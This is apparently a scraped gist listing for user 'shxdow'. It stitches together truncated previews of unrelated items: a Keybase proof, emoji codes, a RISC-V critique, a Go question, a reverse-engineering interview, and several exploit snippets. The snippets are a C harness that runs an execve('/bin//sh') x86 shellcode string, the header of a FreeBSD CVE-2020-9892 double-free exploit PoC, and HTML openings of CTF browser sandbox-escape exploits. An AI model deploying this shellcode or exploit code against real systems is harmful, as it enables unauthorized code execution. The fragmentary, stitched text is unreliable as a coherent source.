shxdow

Keybase proof

I hereby claim:

I am shxdow on github.
I am shxdow (https://keybase.io/shxdow) on keybase.
I have a public key ASDrgGX49-tkeABbpWTQFDhtvlMuedNYggqdm76dM1k4mQo

To claim this, I am signing this object:

People

`:bowtie:`	😄 `:smile:`	😆 `:laughing:`
😊 `:blush:`	😃 `:smiley:`	☺️ `:relaxed:`
😏 `:smirk:`	😍 `:heart_eyes:`	😘 `:kissing_heart:`
😚 `:kissing_closed_eyes:`	😳 `:flushed:`	😌 `:relieved:`
😆 `:satisfied:`	😁 `:grin:`	😉 `:wink:`
😜 `:stuck_out_tongue_winking_eye:`	😝 `:stuck_out_tongue_closed_eyes:`	😀 `:grinning:`
😗 `:kissing:`	😙 `:kissing_smiling_eyes:`	😛 `:stuck_out_tongue:`

Foreward

This document was originally written several years ago. At the time I was working as an execution core verification engineer at Arm. The following points are coloured heavily by working in and around the execution cores of various processors. Apply a pinch of salt; points contain varying degrees of opinion.

It is still my opinion that RISC-V could be much better designed; though I will also say that if I was building a 32 or 64-bit CPU today I'd likely implement the architecture to benefit from the existing tooling.

Mostly based upon the RISC-V ISA spec v2.0. Some updates have been made for v2.2

Original Foreword: Some Opinion

The RISC-V ISA has pursued minimalism to a fault. There is a large emphasis on minimizing instruction count, normalizing encoding, etc. This pursuit of minimalism has resulted in false orthogonalities (such as reusing the same instruction for branches, calls and returns) and a requirement for superfluous instructions which impacts code density both in terms of size and

http://grokbase.com/t/gg/golang-nuts/142spmv4fe/go-nuts-differences-between-os-io-ioutils-bufio-bytes-with-buffer-type-packages-for-file-reading

I'm quite confused as there seems to be multiple redundant ways to solve my problem (read a file, parse the content, serve it via http). Most people on stackoverflow would use bufio, but I just can't get the differences between this package and the Buffer type of bytes and just reading a file with the os methods. Also I don't know when and why I should choose those ways to do it, when I have the simple, but non-versatile, ioutils.ReadFile.

	#!/usr/bin/env python
	import random
	import os
	import time
	import subprocess
	import math


	apps = (
	"emacs",

	#include <stdio.h>
	#include <string.h>

	unsigned char code[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

	main () {

	printf("Shellcode Length: %d\n", strlen(code));

	int (ret)() = (int()())code;

	Bài phỏng vấn Rolf Rolles của HITB hay đến từng cm :D , đây mới đúng là hacker:
	http://magazine.hitb.org/issues/HITB-Ezine-Issue-005.pdf

	What are your favorite reverse engineering tools?
	IDA, Resource Hacker, 010 Editor, VMWare, SoftICE, and those that I develop myself.

	How would you describe the process of reverse engineering to a beginner?
	Step 0: Pose a question (how is the program accomplishing X?).
	Step 1: Find a portion of the code relevant to the inquiry via a variety of static and dynamic means.
	Step 2: Analyze that code to obtain information; annotate the binary with what you have learned.

	/*
	* IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0
	* https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78
	* -
	* Bug credit: Andy Nguyen (@theflow0)
	* Exploit credit: @SpecterDev, @tihmstar
	* Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011
	* -
	* Build: gcc -o expl ip6_expl_poc.c -pthread
	* -

	<html>
	<head>
	<title>RedPwn sbx-1</title>
	</head>
	<body>
	<h1>:thonk:</h1>
	<pre id='log'></pre>
	</body>
	<script src='./mojo_bindings.js'></script>
	<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>

	<html>
	<head>
	<title>0ctf sbx</title>
	</head>
	<body>
	<h1>HK</h1>
	<pre id='log'></pre>
	</body>
	<script src='./mojo_bindings.js'></script>
	<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>